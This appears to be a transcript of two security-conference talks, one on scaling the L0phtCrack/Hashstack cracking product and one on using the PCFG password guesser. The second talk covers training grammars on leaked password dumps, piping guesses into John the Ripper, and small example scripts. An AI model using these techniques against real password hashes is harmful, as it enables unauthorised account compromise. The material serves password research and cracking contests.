malicious behavior, right? So I started coming up with solutions for this. And I somehow got into my head, like, dude, what if computers could vote? Right? Like, you just make it to where, like, you know, if there's a dispute, then one of the nodes, like, requests to vote, right? And so they take a vote and majority wins. 
And if there's a tie, like we have an even number of nodes in the cluster, then like literally fucking flip a coin, you know, randomly, like, play rock, paper, scissors, like, why not? And if a peer doesn't accept the results, like then the rest of the cluster just shuns that peer. And I started thinking about, like, is this, is this actually like a thing? Like, can we actually do this? Am I like completely fucking stoned? It turns out that I really didn't have to put that much more thought into it because this already exists. Like what I thought up is actually a thing called the Raft consensus protocol. So it's cool that it already exists because that, you know, means we don't have to do a whole lot to implement it, but it's also cool because it kind of validated, you know, my ideas and theories on how to make this work. And told me that I wasn't just completely fucking insane. And we found several implementations of the Raft consensus protocol. And the one that we ended up liking the most and settled on is Akka, which runs on the JVM and is written in Scala. Now, I hate Java. I have shunned Java for damn near my entire life. You know, I completely condemn the Oracle JVM. But there is OpenJDK. We don't have to use Oracle. And we don't have to write in Java. We can use Scala and Kotlin. And since I've started to work on this, I actually really like Kotlin. I don't really have too many negative things to say about it. It's actually kind of fun to work with. And then Akka also has some plugins or modules that, you know, help us even further, such as Akka Persistence. What Akka Persistence does is it takes our distributed state machine, which is normally resident in memory, and persists it to disk. And then Akka Distributed Data, of course, would be like what implements the distributed state machine. And then on top of all of that, we built a custom multicast-based protocol to enable cluster nodes to automatically discover each other on the network, and then automatically join the cluster. Now, we made this opt-in because obviously that's kind of a security risk if anybody can just join the cluster. But for some scenarios like where all of your nodes are on a dedicated subnet that's properly firewalled off, and you have proper layer 3 and layer 4 access controls, this would be a solution that would be really handy (there's a rough sketch of that discovery idea just below). So, again, thinking about warehouse scale computing or data center as a computer, let's say you just have racks and racks and racks of compute nodes. You would just unbox one, literally throw it in the rack and power it on, and it would discover the cluster as soon as it's powered on and join the cluster and start doing work. That's kind of the vision that we have for this. And of course, since it's all peer-to-peer, that enables it to actually be just literally that simple. But of course, the default is you manually specify which peers you want to be part of this work. Okay, and then in April this year, a unique opportunity presented itself to purchase L0phtCrack. DilDog approached me and then we entered negotiations and we purchased it early this year, primarily for the GUI, which is written in C++ using Qt as the windowing framework. And while it's not currently cross-platform, that's a really easy language and library to make cross-platform. So instead of Hashstack version 3, we now have L0phtCrack version 8.
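Going back to the multicast discovery idea for a second, here is a toy sketch of the announce-and-listen pattern. The group address, port, and message format are made up for illustration; this is not the actual protocol, and a real implementation would authenticate peers before letting them join anything.

```python
# Toy sketch of opt-in multicast peer discovery: a node announces itself on
# a multicast group and collects announcements from other nodes. The group,
# port, and message format are invented for this example; a real system
# would authenticate peers before admitting them to the cluster.
import socket
import struct

GROUP, PORT = "239.255.77.77", 50505  # arbitrary values for the sketch

def make_listener():
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", PORT))
    mreq = struct.pack("4sl", socket.inet_aton(GROUP), socket.INADDR_ANY)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    return sock

def announce(node_id: str):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.sendto(f"HELLO {node_id}".encode(), (GROUP, PORT))

def wait_for_peer(sock):
    data, addr = sock.recvfrom(1024)
    msg = data.decode(errors="replace")
    if msg.startswith("HELLO "):
        return msg.split(" ", 1)[1], addr[0]  # (peer id, peer address)
    return None
```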
And while L0phtCrack 7 uses John the Ripper as a back-end, we've ripped all that out and we are in the process of integrating what was Hashstack version 3 as the new back-end for L0phtCrack 8. And the final thing we're doing with this is we are dropping the TerraHash hardware requirement. Traditionally, we do not let people purchase Hashstack as a standalone product. We say like, you know, the only way to get Hashstack is to buy a TerraHash appliance and it comes pre-installed, and that's the only way to get it. But L0phtCrack has always been sold standalone, so we are changing the model now to where, you know, keeping with L0phtCrack being sold standalone, we're going to be selling, you know, L0phtCrack 8 as a standalone product without the TerraHash hardware requirement. So yeah, that's where we are now with development. That's how the product has evolved over time and those are some of the challenges that we have faced trying to obtain our goal of true warehouse scale computing. Thank you and I hope you've enjoyed this.
|
Cracking at Extreme Scale
|
10.5446/51599 (DOI)
|
So real quick about me, I have a bit of a reputation as kind of approaching this as an academic frame set, simply because I got started in the whole password cracking thing through my research when I was getting my PhD. But I really do strongly believe in learning by doing. So I'm an active member in Team John Ripper, and I do participate in password cracking contests like, you know, Crack Me If You Can, that's going on right now. Luckily, this talk is, you know, being filmed, you know, before the contest starts. So no spoilers here, unfortunately. But good luck to everyone else who's participating. So password cracking really, it's my hobby and a little bit of an obsession, but it's not my day job, unfortunately. But my day job has been very exciting recently, though, because I really focus on medical device security. And you can imagine with all the greatness around COVID-19, that has been a, it's been an interesting time. So one project that I really kind of want to highlight is the open ventilator monitoring and alerting project that I've been helping to contribute to. And there's actually a talk at the biohacking village this Sunday, and I really highly recommend people go ahead and listen to. So our team members are giving it, and it really is going to talk to you about, you know, how the lessons learned and how other people can help contribute as well. Because this has been a big problem, because as I'm sure you're aware, there's been a huge demand for ventilators to be able to help deal with COVID-19. So there's been a lot of different projects that have kind of stood up to try to help produce, you know, low-cost ventilators to help fill that need pretty quickly there. So rather than have every single do-it-yourself ventilator develop their kind of whole monitoring and alerting framework, we're trying to produce one common one that can be applied to all these different projects across the board. So because when you have these ventilators being able to treat in, you know, patients, the patients are highly infectious, so you don't want to have the nurses exposed to that. But if something goes wrong, you need, you know, seconds count, so you need to be able to forward all that sensing information that the ventilator is doing back to a centralized nursing workstation. And you need to do that securely because you're running on just a real hospital network. So that's been a really fulfilling project that I've been working on. So the other thing that I'm kind of helping out with here, as I'll move my head, is I'm helping out run the DEF CON Biohacking Village's Capture to Flag Contest. So this was originally supposed to be in Vegas. That changed, of course. So now a lot of big equipment is actually sitting in my house. So I have to be able to provide a way for hackers from all over the world to be able to log in and hack these infusion pumps here without also hacking my smart thermostat. It's part of that I actually had to repurpose one of my password cracking rigs, as you can see there, in order to run all the VMs that are helping to keep people, you know, on those ventilators and hacking those and not, you know, hacking my smart thermostat. So one, probably the first questions that should start kind of addressing here is, you know, what does that PCFG stand for in, you know, PCFG password cracking? 
So originally, and I guess still technically, it stands for probabilistic context-free grammar, which is the modeling framework it uses, the model of how people create passwords. If you're into automata theory or formal languages, that might actually mean something to you, but most people hear that and go, oh god, that's like math and stuff, there's no way it's going to run on my computer, and then they slowly walk away. So I decided I needed a more descriptive name and rebranded it as the Pretty Cool Fuzzy Guesser. That actually explains a little better what it's doing under the hood: you train it on a list of passwords, and then it creates guesses that are similar to those passwords, but different, which is really important for expanding your cracking session. This is my favorite slide I've ever made, so it's all downhill from here. What it's really doing is using machine learning to crack passwords, and when I say machine learning, I mean that in the traditional sense of a whole bunch of if-then statements. It's not using neural networks or artificial intelligence, but you are training on passwords that you expect to be somewhat similar to the target passwords you're cracking. When it processes that training password set, it extracts all sorts of probability information about the components of the passwords it finds there. It figures out things like capitalization masks, whether numbers go at the beginning of the password versus the end, the probability of individual letters and numbers found in those passwords, keyboard walks, and so on. It builds a model based on all those different types of probability information, and then uses that model to generate highly probable password guesses in probability order. It starts with the most probable password guess, goes to the second most probable, then the third, and so on until you crack the password you're trying to find or you give up. Let me just move my video feed a little here. To tie this back into what's probably going on right now: as I said, I don't know what the actual contest will look like for Crack Me If You Can, but KoreLogic helpfully provided a brief summary of what the scenario is going to be, at least. We're going to be targeting 12 different individuals, and those individuals change their passwords over time in order to deal with more complex password creation requirements. That sounds a little bit like something a PCFG might actually be useful for, so I'm really optimistic for this contest; you'll see how that optimism held up on Saturday, when this talk actually goes out. But this is the kind of scenario the tool was originally developed for in the first place: you know how a subject creates passwords, so you want to create passwords similar to those, but you also want to change them, for example to account for more complex mangling rules or more complex password creation requirements added on top.
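To make the "guesses in probability order" idea concrete, here is a minimal Python sketch of a toy grammar along the lines described above. Every word, suffix, and probability below is invented, and the real pcfg_cracker keeps these structures in a priority queue instead of materializing and sorting every combination; treat this purely as an illustration of the concept, not as how the actual guesser is implemented.

    import itertools

    # Toy "grammar" with invented probabilities, standing in for what a real
    # training pass would learn from a password dump.
    base_words = {"password": 0.05, "monkey": 0.02, "dragon": 0.01}
    digit_suffixes = {"": 0.4, "1": 0.2, "123": 0.1, "2020": 0.05}
    case_masks = {str.lower: 0.7, str.capitalize: 0.3}

    # Score every terminal combination and emit the guesses in probability order.
    candidates = []
    for (word, pw), (digits, pd), (mask, pc) in itertools.product(
            base_words.items(), digit_suffixes.items(), case_masks.items()):
        candidates.append((pw * pd * pc, mask(word) + digits))

    for prob, guess in sorted(candidates, reverse=True):
        print(f"{prob:.4f}  {guess}")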
So I'm available on Discord right now, and I'll be able to answer questions about how you might tweak this to help in a scenario like that contest one. One nice thing about there being a lot of academic papers on this is that when I give a talk like this, I don't actually have to create any of my own graphs; I can just go to other papers, look at the research other people have done, and pull out their graphs to talk over. One thing I really want to highlight, though, and you need to look at this with a bit of a skeptical eye, is that all of these cracking sessions are really short. I know one trillion guesses might sound like a lot, but once we start talking about GPU password cracking, that's under a second of guessing, which is no time whatsoever. Part of the reason for this is that the PCFG approach is very slow, and it doesn't scale very well with multithreading currently. So when you think about which passwords you want to crack with it, it works very well when you're targeting very slow password hashes, where you can only make thousands of guesses a second because the hash is so expensive. When we start talking about things like unsalted MD5, other attacks are going to be much more effective, because you can simply make so many more guesses in the same time frame. For faster password hashes you can certainly still use a PCFG to supplement your attack, and you'll crack some passwords you might not otherwise get, but in general you're going to want to use more traditional password cracking attacks to really make use of the hardware you have available. I want to focus on this graph, though, because it comes from a really neat study done by Carnegie Mellon University. One of the problems with academic research, especially on offensive tactics, is that the academics run the attacks themselves, so you're looking at how effective students are at cracking passwords versus a professional. CMU took probably the most straightforward approach to solving that problem: they reached out to KoreLogic. You might have heard of them; they're running this Password Village and they run the Crack Me If You Can competition, so when you're trying to find an expert, they're way up there. They're a pretty good representation of a professional. What CMU did was give one of the KoreLogic engineers a password list, ask them to crack it, record how many passwords they cracked over time and the number of guesses they made, and then compare that against other cracking sessions. And one thing that makes me smile every time I see this is that the PCFG did really well compared to the pros, which was KoreLogic, for that short cracking session.
So when you ask whether this can represent how a real professional password cracker operates, the short answer is that it certainly appears to. Full disclaimer: when KoreLogic had more time, they definitely performed way better. This is a logarithmic graph, so that's about 100 times more guesses. And I'll admit this wasn't fair to KoreLogic either, because that's not typically how people crack passwords in real life; it was such a short cracking session, and when a session really is that short it's usually against a really strong password hash, and you have a lot of time to manually tweak the attack you're running. That being said, if any of you are listening, I would love a rematch just to see how this performs with all the new improvements that have been made to PCFGs, and I'm sure KoreLogic has been upping their game over the years as well. That's why I'm somewhat hopeful we'll find it useful in the contest that's going on right now. So, enough about the research side; let's talk about how to actually make use of this PCFG password cracker. The first thing is to just download it from the GitHub repo. As for requirements, I have really strived to make it as simple as possible: you need Python 3, and that's it. There's an optional chardet Python module that can help during training, because it detects the character encoding of the training set, and character encoding is the bane of my password cracking existence. But even that's optional, and it actually now gets installed along with pip3, so if you have pip you probably don't need to install it yourself. This is really useful because I find a lot of situations, like when I'm cracking passwords, where I don't have internet access, so it's nice to be able to quickly throw my tool on a box and get it running. If you can run Python 3 on a box, you can probably run this. I've tried it on a bunch of different OSes; I've even gotten it to run on NetBSD, and it's about the only thing I've ever gotten to run on NetBSD. So hopefully this is easier than your typical academic tool set to get installed and start cracking passwords with quickly. Now, hardware requirements, because that's always an important part of password cracking. The PCFG tool set is single-threaded and CPU bound, which is why it's so awfully slow, but it will use an entire CPU thread, so you really do need to dedicate one full CPU thread to it. The other thing is it has very high RAM usage. It maintains a lot of different data structures in memory, and those data structures become more complex over time, so memory use just grows. I could have tried to prune that or move some of it to disk, but RAM is cheap, so I haven't; it'll just keep growing over time. Initially it starts with fairly low usage, but if you're talking about running a password cracking session for a week or two, you really need at least 16 gigabytes of RAM to dedicate to the PCFG tool set itself.
The next step is to actually make use of it and run it. I apologize up front that I tend to use the words ruleset and grammar interchangeably; to me they mean the exact same thing. What I'm talking about is that, as I mentioned, this is machine learning: you have to train a grammar on an existing password data set. You may want different grammars for different targets. If you're targeting a web application catering to younger people, you might want to train on passwords that resemble that; if you're targeting corporate passwords, you might want to train on corporate passwords instead, and use those rule sets against targets you think will match them. You can have as many rule sets as you want, to really fine-tune your cracking session. The default rule set that ships with the PCFG password cracker was trained on a subset of one million passwords from the RockYou data set, which came out back in 2009. Those were web passwords, so there wasn't really any strong password requirement. I've been thinking about updating that, so if you have a good data set you think I should use instead, I'd love to hear about it. That said, the RockYou data set is still extremely effective even today; it's just that blink182 is not nearly as popular anymore. Once you have the rule set you want to use, you start generating guesses. It's a Python program, so you run the pcfg_guesser.py tool from the repo with Python 3. You give it the name of the rule set, which defaults to Default, so if you don't specify one it uses the RockYou-trained rule set, and you specify a session name, which also defaults to default. The session name is used to restart a password cracking session: if you have to cancel it for whatever reason, you can start it back up again. I really want to highlight, though, that the PCFG tool set is only a password guess generator. It generates password guesses in probability order: the most probable guess, then the second most probable, and on down the line. It will not actually hash and crack any passwords, so you need another password cracking tool for that. Both John the Ripper and Hashcat work, as does basically any other password cracking tool that accepts guesses from standard input. As I mentioned earlier, I'm on team John the Ripper, so I'm going to use John for pretty much all of my examples, but you can totally use Hashcat as well. To do this, you run the command I just talked about and pipe it into, for example, John. John has an option called --stdin; with that, instead of reading guesses from a word list or generating them itself, it uses the password guesses that are piped in. And you're cracking passwords. That's really all there is to it. There are definitely optimizations for actually using this in the real world, though.
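To make that split between guess generation and hash cracking concrete, here is a small Python stand-in for the cracking side of the pipe. It is not John or Hashcat, just a toy consumer that reads guesses from standard input, hashes them with unsalted MD5, and reports matches; the target passwords are invented and derived inside the script so the example is self-contained.

    import hashlib
    import sys

    # Pretend these are leaked unsalted MD5 hashes we are attacking. They are
    # derived here from made-up passwords so the demo is self-contained; in
    # real life you would load them from a dump file.
    targets = {hashlib.md5(p.encode()).hexdigest() for p in ("password1", "Monkey123")}

    # Read candidate guesses from stdin (for example, piped from a PCFG guess
    # generator), hash each one, and report any hits.
    for line in sys.stdin:
        guess = line.rstrip("\n")
        if hashlib.md5(guess.encode()).hexdigest() in targets:
            print("cracked:", guess)

A pipeline along the lines of python3 pcfg_guesser.py | python3 check_md5.py (the consumer's file name here is made up) would then mirror the guesser-into-John setup described above.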
So, on to real-world usage tips. The first thing I want to highlight is that a lot of times you want to know the status of a cracking session. The challenge when you're piping guesses in is that if you hit the enter key, instead of going to John the Ripper, that keystroke gets forwarded to my tool. So if you want John the Ripper to output a status report, the way to do that is to send a SIGUSR1 signal to it. On a Linux system, you just type kill -SIGUSR1 and then the process ID of John the Ripper. When you do that, it's just like hitting enter in John the Ripper itself, and it outputs the status of its current cracking session. Then you can see not only the passwords getting cracked, but things like the number of hashes cracked so far out of the total, the guessing speed (in this case it's making about 4 million guesses a second), how long it's been running, and all the other details as well. I want to dig into the output of that cracking session, though, because I think it really helps demonstrate some of the power of using the PCFG. Normally you're just sitting here watching the passwords as they get cracked, and you can see that it's not figuring out one rule, exhausting that rule, and then going to the next rule, like you would see in a more traditional password cracking session. Instead, it's creating much more fine-grained rules and interleaving between all of them depending on what the current probability is. When you see these passwords being cracked, it's kind of fun to try to figure out how the underlying system generated that guess and why it's making that particular guess right now. If you look at the start here, this is pretty easy; it's just taking some five-letter words. I apologize, my microphone just died there; fun times doing DEF CON remote. So it's using five-letter words plus four digits here. Moving on, this is an interesting one: "SESS is cool." I looked, and that string was not in my input dictionary or my training set at all, and I found out it was actually using multi-words for this: it was combining "SESS" and "iscool." One cool thing about this, and I'll talk about it a little later, is that instead of breaking it up into three words, like we would normally think about it, it actually broke it up into two tokens, "SESS" and "iscool." That way it can go through and ask: is Katie cool, is Allie cool, is Bob cool? Because there are a lot of cool people out there. It can iterate through those and try that type of mangling rule. And what's really cool is that it learned "iscool" is a common token from the training set itself; I never actually programmed that logic into it.
It learned that by itself by looking at the training data, which, as I said, is pretty cool. After that you can see it went into brute force. It wasn't pure brute force (I'll talk about the different types of brute force later); it was actually combined with some very short words, kind of like a combinator attack, but you can still see it getting results that way. Then it tried words with special characters, the same special character at the beginning and the end. You might be able to see that in a traditional password cracking session, but you'd have to have a rule to generate it, and creating those rules is a real pain, so you won't see them in most publicly available rule sets. It learned that from the training data too, which I thought was pretty cool as well. Down here, and I need to get my video out of the way, you can see it's trying some longer words. While these look like normal words, it actually generated them via multi-words as well: finger plus nail, or 90 plus 9. Once again, this is really useful, because now you don't have to have things like 99, 98, 93 in your word list, since it generates those on the fly. Going down a little further, this is a more traditional kind of rule: two digits plus capitalizing the first letter of a word. You can see it starting to do that, but "settings" is a pretty uncommon password word, so it tries it later in the cracking session. And now it's combining even more mangling rules: doing a multi-word of wood plus fish, or terra plus dawn, and adding digits to the end of that as well. You can see how it stacks these different rules together. I want to highlight that this cracking session has been going on, as you can see from the status output, for about 13 minutes, so all the really easy passwords have already been cracked; it has already guessed 123456 and password12345 and so on. These are getting into the fuzzier parts of the rule set that you might not normally see in a typical password cracking session. As I mentioned a little earlier, if you hit the enter key it goes to my program, not John the Ripper, and there's a lot of information I want to provide people about the status of their cracking session. So whenever you hit enter, or basically any key, it displays an output of what it's currently doing, so you can figure out whether you want to continue, whether it's working correctly, and whether it's doing what you want it to do. Going through this here, I hit enter twice, so you can see how it's generating these password guesses. The first one is basically trying to combine two words, so it's a multi-word type of attack, and if you dig into the details, you can see it's trying the 140th most probable word with no capitalization.
And it's combining that with the 93rd most probable four-letter word, also with no capitalization. So you can see that the probabilities it assigns, down to individual words, are very fine-grained. It will try some words, then do other mangling rules and things like that, and come back to the less probable words later in the cracking session. In this next one, and let me try to get out of the way, you can see it switched to a real brute force attack using OMEN, the Ordered Markov ENumerator, and I'll talk about that a little later. What I really want to highlight is that it's interleaving: it tries more traditional cracking rules like combining words, then switches to brute force, then switches to another mangling rule after this, and it just keeps going based on whatever the current probability is. Now, as I said, I really struggle with documenting my code, so I try to put as much documentation into the runtime behavior as possible. If instead of hitting enter you hit H, it provides a status report explaining what all these different fields mean. That status report is actually much longer than what's displayed on the screen here, and it explains what all those letters like A5 or C5 actually stand for. The one metric I really want to highlight, though, is this thing called probability coverage. Since the PCFG password cracker creates guesses in probability order, starting with very high probability passwords and moving to less and less probable ones, and since the model it has will basically never finish (it'll just keep finding new combinations of words to run through), a real challenge becomes: when do you give up on a cracking session? You haven't cracked the password; when should you kill this off and try some other type of attack that might be more successful, or just decide you're not going to crack this password and move to a different case? Probability coverage is a very fuzzy metric I tried to develop to give you a bit of a rule of thumb about when that should be. What the metric says is: if the target password came from the same probability distribution as the passwords I trained on, and if my grammar's model of how the password was created were exactly correct, this is the probability that we would have cracked this password by now. Now, neither of those assumptions is actually true in real life. The probability distribution of the password you're trying to crack is probably very different, and the grammar I generate and train on is absolutely not perfect. But at least it gives you a rule of thumb to say, okay, this is starting to get a little high; it says I had something like a 90% chance of cracking this password, I haven't cracked it yet, maybe I should give up. You'll notice this number jumps up really fast initially, because it's making high probability password guesses, and then it slows to a crawl, barely advancing at all, once you get to 70, 80, 90% completion.
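As a toy illustration of that coverage idea: under the (unrealistic) assumption that the grammar's probabilities are exactly right, coverage is just the running sum of the probabilities of every guess made so far. The numbers below are invented purely to show the shape of the curve just described, fast early growth and then a crawl.

    # Made-up per-guess probabilities, in the descending order a PCFG emits them.
    guess_probs = [0.08, 0.05, 0.04, 0.02, 0.01, 0.005, 0.001]

    coverage = 0.0
    for i, p in enumerate(guess_probs, start=1):
        coverage += p                      # cumulative chance of a crack so far
        print(f"after guess {i}: coverage = {coverage:.3f}")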
Coming back to the real tool, that coverage number is really good for figuring out when you can devote that single CPU thread and that RAM to something else. Another usage tip I want to highlight is that sometimes the speed dynamic is completely reversed. You might be cracking very computationally expensive password hashes, or a lot of, say, salted hashes, in which case you're really only making a couple of guesses a second. Meanwhile this generator is producing somewhere between 100,000 and 4 million guesses a second, so it gets backlogged and essentially freezes while it waits to send more guesses to the password cracking program. Occasionally, if you hit enter, it won't display the status, or it'll take a while to display it, and that's usually what's happening. If that happens and you're curious whether the cracking session has crashed or not, I recommend going back to my earlier advice about sending a signal to John the Ripper and seeing how it's doing, just to make sure your password cracking session is still running. As I mentioned, the multi-word feature has probably been the biggest addition in the new 4.0 rewrite, and it has completely shocked me how effective it has been. I won't go into too much detail, but the one thing I really want to stress is that it is not language specific at all. It learns what constitutes a word from the training set you give it, so it will pick up things like new band names, proper nouns that are really hard to put in a language dictionary, or whatever new Pokemon just came out. It identifies patterns like "ilove" and so on. This is very useful for targeting new password sets. It works best with European, English-type languages; it still really struggles with some other languages like Mandarin, but that's absolutely something I want to focus on more going forward. It's not perfect; it's definitely a work in progress. There's a balance against creating false-positive matches, and if it doesn't see some of the base words in the training set by themselves, it won't identify them. But it's evolving, and part of the new pull request I just received from somebody else actually has some improvements to this that I'm really excited about pushing to main. One of the other big features added recently is OMEN, the Ordered Markov ENumerator. The whole reason I bring this up is that a similar approach can be taken for pretty much anything: if someone creates a better cracking attack or cracking mode, it can totally be incorporated into a PCFG-style attack, a little bit like the Borg in that respect. The real challenge is figuring out how to assign a probability to a password guess. If you can assign a probability to a password guess, I can probably incorporate it into a PCFG.
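Before moving on, here is a heavily simplified Python sketch of the multi-word idea described a moment ago: tokens and their counts come from the training data (the counts below are invented), and a candidate string is split into known tokens by preferring the longest matching prefix. The real trainer is considerably smarter than this, so treat it only as a sketch of the concept.

    # "Base words" observed in a training set, with made-up counts. Nothing here
    # is language specific; the tokens are whatever the training data contained.
    word_counts = {"is": 50, "cool": 40, "iscool": 30, "finger": 5, "nail": 5, "sess": 2}

    def segment(s):
        """Return one split of s into known tokens, or None if it can't be done."""
        if not s:
            return []
        for i in range(len(s), 0, -1):        # prefer the longest known prefix
            prefix = s[:i]
            if prefix in word_counts:
                rest = segment(s[i:])
                if rest is not None:
                    return [prefix] + rest
        return None

    print(segment("sessiscool"))    # ['sess', 'iscool']
    print(segment("fingernail"))    # ['finger', 'nail']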
So in the last little bit here, I want to highlight some additional tricks that are very useful when it comes to cracking passwords. The first one is the skip brute option in the PCFG guesser; basically, it disables OMEN guess generation. That's not to say OMEN guess generation is a bad thing, because it definitely helps increase the success of a password cracking session, but this is a way to parallelize your attack. If you have another system that's really churning through your brute force attack, you might want to do all your brute force on that other system, or in another thread, and have the PCFG guesser focus on just the word mangling rules instead. To do that, you just add the skip brute option when you run it. Another flag that's really useful is the all lower flag, which stops it from doing any sort of case mangling on the password guesses. Let me move my picture a little to make this easier to read; I apologize. A lot of the time you may not want to do case mangling inside the PCFG itself. One reason might be that the hash you're targeting is case insensitive, like LANMAN, though that's probably not the best example, because if you're cracking LANMAN hashes you're not using a PCFG for it; you're just brute forcing that sucker and taking it out that way. More likely is that case mangling is very distinctive to the individual: if someone does a certain type of case mangling, they tend to keep using that strategy for all their other passwords. So when you're doing targeted password cracking, you may not want to just do what everyone does; you want to use the specific case mangling for that particular individual. In that case, the better way to do it is that John the Ripper supports a really powerful feature called --pipe. What --pipe does is, instead of just taking the guesses in from standard input and running them as-is, it lets you apply additional rules on top, like you would in a traditional dictionary attack. So you can specify your very specific case mangling rules inside John the Ripper's rule set, pipe the lowercase password guesses into John, and have John do the capitalization itself. That can be very powerful when you have an idea what type of case mangling you want to target. I, of course, moved my video to the wrong spot; let me move my screen again, I apologize. Some coming improvements: as I mentioned, there was an amazing pull request submitted to me with a bunch of new features. I'm slowly incorporating them into the core, but the features are also available as their own tool called segmenter.py. I apologize if I mispronounce the name, because I've only ever seen it written, but Chun-Wan Wang submitted this, and it really impresses me. Probably the biggest feature I'm excited about is leet speak replacement. That's a feature that has kind of eluded me as far as implementing it; every time I've gone at it, it just hasn't been very effective. But it's currently incorporated into this segmenter.py tool that's now included in the repo, which will try to parse that information out.
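As a stand-in for what those downstream John the Ripper --pipe rules would do, here is a small Python filter that reads lowercase guesses from standard input and emits case-mangled variants. The two masks chosen are assumptions for illustration only; in practice you would express the target's actual habits as John rules and use --pipe instead of a script like this.

    import sys

    def mangle(guess):
        # Two illustrative case masks: capitalize the first letter, or
        # uppercase the whole guess. Swap in whatever your target favors.
        yield guess.capitalize()
        yield guess.upper()

    for line in sys.stdin:
        base = line.rstrip("\n").lower()
        for variant in mangle(base):
            print(variant)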
I'm looking at getting that leet speak handling incorporated into my core trainer, and into password cracking sessions, so you can really target that. He also improved some of the multi-word detection, so that got better, and he incorporated some new approaches into the password scorer, which is a different tool: you can submit a password to it and it will tell you what the probability of that password is, which is kind of nice as well. All credit goes to him for these really impressive improvements, and if anyone else is looking at helping out, I'm all about that. So thank you very much once again for that. Okay, let me move my screen around again. The next thing I want to talk about is the compiled PCFG guesser. I've been talking about the Python tools up to this point; the compiled PCFG guesser is a completely different fork, and you can find it under that name on GitHub. It's not written in Python; it's written in compiled C code. It's a little bit harder to get installed and running, simply because once you start talking about compiled code, it runs great on my machine but has challenges elsewhere. I tried to use the Hashcat build makefile for this, so if you can build Hashcat on a computer, you at least have a better chance of getting this running as well. If you have problems, please reach out to me on the GitHub site and I can try to help you fix them. I will say the trainer portion will always be written in Python; I just like writing Python too much to change that. So you create the trained rule sets with the Python trainer and then copy them over to be used by the compiled version. Also, the compiled version tends to lag behind the Python tool set in features, because, once again, I like writing in Python and I'm not the best C coder in the world; if I write a hello world program, it's going to have five buffer overflows and a segfault. So that's what you get there, but I'm making it available, and if someone wants to write a better one, I'm totally open to that. It doesn't have save/restore, it doesn't have the status outputs, and it has no OMEN guess generation. All that being said, why bother with it? At the end of the day, the main reason is that it's about 20 times faster than the Python tool set. I'd always heard that C code is faster than Python, but when I saw that, I was like, holy crap. I'll be upfront: even with all these limitations, when I'm cracking passwords I'm using the compiled C version much, much more often than the Python one now, because that 20x speed improvement is hard to beat for most password cracking sessions. Now I'm going to talk real quick about training passwords, since I've mentioned it a lot. There are a lot of different reasons you might want to create a new password training set. Language is a huge one; you want to train on passwords that are similar to the target you're trying to crack. Another big one is that corporate passwords are very, very different from what you'll see from websites, and I'm sure you probably heard KoreLogic talk about this yesterday.
That difference is very evident, so if you're trying to target corporate passwords, you probably do want to train on corporate passwords rather than on passwords from some gaming website. Another reason to train your own rule set is if you're targeting a specific password creation policy, or you know which mangling rules your target prefers. One way to really target that is to train only on passwords that match that policy. There are other things you can do too: the rule sets, or grammars, that I generate deliberately don't include anything like a CRC check or other integrity checks, and the files themselves are just text files, so you can open them up and start editing the probabilities of different things in them by hand. If you say, here's one word I really want to make highly probable, but I don't want to train a whole new rule set, you can just open the file, put that word in, give it whatever probability you want, and that will be read in and used in your password cracking session. The other reason to train on a password data set is that the trainer extracts a lot of information from it, so it's really useful for analyzing a new dump you have access to. For example, it will pull out common emails, dates, and websites, and help you figure out where a password data set came from. The next question, of course, is where do you get these password data sets? There are a lot of challenges here too, because many data sets are not optimal to train on. I don't know if you know of hashes.org, but it's a really great site for downloading all these dumps as they come out. For example, let's say you want to train on this data set here. I'm not going to try to pronounce the site name, because I'm sure I'd horribly mangle it, but when I did some googling, it was a site for new college students trying to find a job in China. That's an interesting data set you might want to use to crack passwords. If you download something from hashes.org, the most important thing is to grab the plain-text option to train your rule set on, because you don't want to include the hashes in your training set; the trainer will think they're part of the password, and that goes poorly. One other thing I want to highlight, and this is a feature I'm hoping to get added to the PCFG tool set, is that I was informed by the owner of the site that they actually do some additional encoding of non-UTF-8 characters, so my trainer will not fully parse those correctly. That's something I need to add so it uses the correct character encoding for non-English passwords; I just want to put that warning out for anyone trying to train on things like Mandarin. One problem with a lot of these dumps, the first one, is that they don't contain duplicates.
Duplicates are really important when it comes to figuring out the probability of a password, because without duplicates, 123456 looks like a very random string. That said, when you run longer cracking sessions with PCFGs, the lack of duplicates becomes less and less important, because you've already exhausted all the really probable password guesses. The one issue is that the OMEN portion really does struggle without duplicates, so you might not want to enable OMEN guessing if you trained on a data set that doesn't contain any. The other problem with these dumps is that they only contain the passwords that have been cracked, so you don't learn anything about the passwords that haven't been cracked. That's not a deal breaker, but it's useful to keep in mind; the crack percentage is going to be very useful when it comes to figuring out how good a data set is for creating a new rule set. To actually train on a password data set, the trainer is a Python program once again. You just give it the name of the rule set you want to create as well as the password data set you want to train on, and it will do all the parsing and stemming of the password data set. It will try to auto-detect the encoding, but when in doubt, set it to UTF-8, because the encoding really does matter quite a bit. On the first pass through the data set, it learns the character frequencies and the base words for multi-word detection; it actually makes a couple of different passes through the same data set in order to learn more and more about it. On the second pass, it does much of the real parsing of the passwords: it figures out things like keyboard walks, alpha strings, how probable the digits are, and so on. Most of the stuff you traditionally think of when you talk about the probabilities of different things happens on that second run-through. Then it makes a whole other pass to see how effective something like OMEN would be for cracking these passwords, which gets back to how OMEN assigns probabilities to its different levels. This takes a while. If you're training on a million passwords, it's done in a minute or two; if you're training on a billion passwords, it takes significantly longer, and it has to keep all this data in memory, so really gigantic data sets are just not going to work. One thing you might want to do instead is select a randomly chosen subset of that password set to train your rule set on. After it's all done, it displays statistics about the data you just trained on, which are really useful for figuring out where it came from: password lengths and things like that. One thing I added that I've found really useful is that it displays the top URLs and emails it finds; the top entries are usually webmail email account domains.
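To give a flavor of the kind of counting those training passes do, here is a heavily simplified Python sketch: it splits each training password into letter and digit runs, records the resulting structures and digit strings, and turns the counts into probabilities. The training list is made up, and the real trainer extracts far more (capitalization masks, keyboard walks, multi-words, OMEN statistics), so this is only a conceptual sketch.

    import re
    from collections import Counter

    # Made-up training passwords.
    training = ["password123", "monkey1", "summer2020", "password1", "dragon123"]

    structures = Counter()   # e.g. "A8D3" = 8 letters followed by 3 digits
    digit_runs = Counter()

    for pw in training:
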